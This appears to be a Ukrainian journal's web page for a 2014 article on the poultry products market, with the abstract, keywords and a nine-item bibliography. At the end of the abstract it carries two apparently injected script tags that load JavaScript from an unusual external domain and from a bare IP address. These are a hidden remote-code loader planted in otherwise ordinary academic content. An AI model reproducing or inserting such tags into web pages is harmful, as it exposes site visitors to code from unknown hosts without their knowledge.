ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.433
Сторінка молодого науковця

Аналіз сучасного стану ринку продукції птахівництва в Україні / Кирилюк Д. О. // Економіка АПК. - 2014. - № 2 - С. 116

Висвітлено особливості продукції птахівництва, якісні показники яєць та м’яса птиці, визначено важливість і корисність продукції птахівництва для населення. Встановлено актуальність та необхідність проведення досліджень розвитку українського ринку продукції птахівництва, проаналізовано його динаміку. Відображено структуру утримання поголів’я птиці в Україні в сільськогосподарських підприємствах та господарствах населення, проілюстровано динаміку щорічного споживання яєць і м’яса птиці, динаміку виробництва яєць та м’яса птиці в Україні, а також тенденції експорту й імпорту м’яса птиці на вітчизняному ринку. Встановлено основні фактори, що впливають на функціонування ринку продукції птахівництва в нинішніх економічних умовах країни. Запропоновано перспективи подальшого розвитку вітчизняної галузі птахівництва. Рис.: 5. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ринок продукції птахівництва, яйця птиці, м’ясо птиці, виробництво, споживання, експорт, імпорт

Список використаних джерел

  1. Bezlepkina, I., S. van Berkum and M. Rau. Prospects for Ukraine's agrifood sector; Implications for Dutch trade relations – LEI report 2013–045.
  2. Fao statistical yearbook – Food and Agriculture Organization of the United Nations, Rome, 2013.
  3. Global poultry trends 2013: Russia and Ukraine Lead Europe’s Growth – [Режим доступу] – http://www.thepoultrysite.com/articles/2954/global-poultry-trends-2013-russia-and-ukraine-lead-europes-growth.
  4. World agricultural outlook – Food and Agricultural Policy Research Institute, Iowa State University and the University of Missouri-Columbia, 2010.
  5. Бутенко О.С. Оптимізація розміщення і нова парадигма розвитку птахівництва в Україні / О.С. Бутенко // Агросвіт. – 2008. – №9. – С.24–26.
  6. Державна служба статистики України [Електронний ресурс]. – Режим доступу: http://ukrstat.gov.ua/
  7. Мельник Б. Стан та резерви збільшення обсягів виробництва продукції птахівництва / Б. Мельник // Тваринництво України. – 2002. – №2. – С.10–12.
  8. Союз птахівників України [Електронний ресурс]. – Режим доступу: http://www.poultryukraine.com.
  9. Ярошенко Ф. Птахівництво в Україні: проблеми становлення / Ф. Ярошенко // Економіка України. – 2003. – №1. – С.70–74.
Читати статтю: 14_02_116-119.pdf
Читати переклад статті: 1402kyryliuk.pdf